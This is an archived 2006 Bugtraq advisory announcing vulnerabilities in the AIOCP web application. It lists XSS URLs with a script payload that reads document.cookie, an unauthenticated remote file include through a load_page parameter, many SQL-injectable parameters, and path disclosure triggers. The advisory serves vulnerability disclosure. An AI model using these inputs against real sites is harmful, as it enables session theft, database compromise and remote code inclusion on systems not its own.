lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 6 Nov 2006 06:37:46 -0000
From: saps.audit@...il.com
To: bugtraq@...urityfocus.com
Subject: AIOCP <=1.3.007 multiples vulnerabilities [sql , remote file
 include , xss]

AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , xss] 

XSS get =
- /public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
- /public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>

xss post in user profile :
- signature
- fiscal code

remote file include =
/admin/code/index.php?load_page=http%3A//google.com
( no login needed for the remote file include ) 

sql injection =
- /public/code/cp_dpage.php?choosed_language=[sql]
- /public/code/cp_news.php?choosed_language=[sql]
- /public/code/cp_news.php?news_category=[sql]
- /public/code/cp_forum_view.php?choosed_language=[sql]
- /public/code/cp_edit_user.php?choosed_language=[sql]
- /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
- /public/code/cp_newsletter.php?choosed_language=[sql]
- /public/code/cp_links.php?links_category=[sql]
- /public/code/cp_links.php?choosed_language=[sql]
- /public/code/cp_contact_us.php?choosed_language=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?product_category_id=[sql]
- /public/code/cp_show_ec_products.php?order_field=[sql]
- /public/code/cp_login.php?choosed_language=[sql]
- /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
- /public/code/cp_codice_fiscale.php?choosed_language=[sql]
- /public/code/cp_links_search.php?orderdir=[sql]


full path disclosure =
- /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
- /public/code/cp_show_ec_products.php?order_field[]=
- /public/code/cp_show_page_help.php?hp[]=

global risk = hight

laurent gaffié & benjamin mossé
http://s-a-p.ca/
saps.audit@...il.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ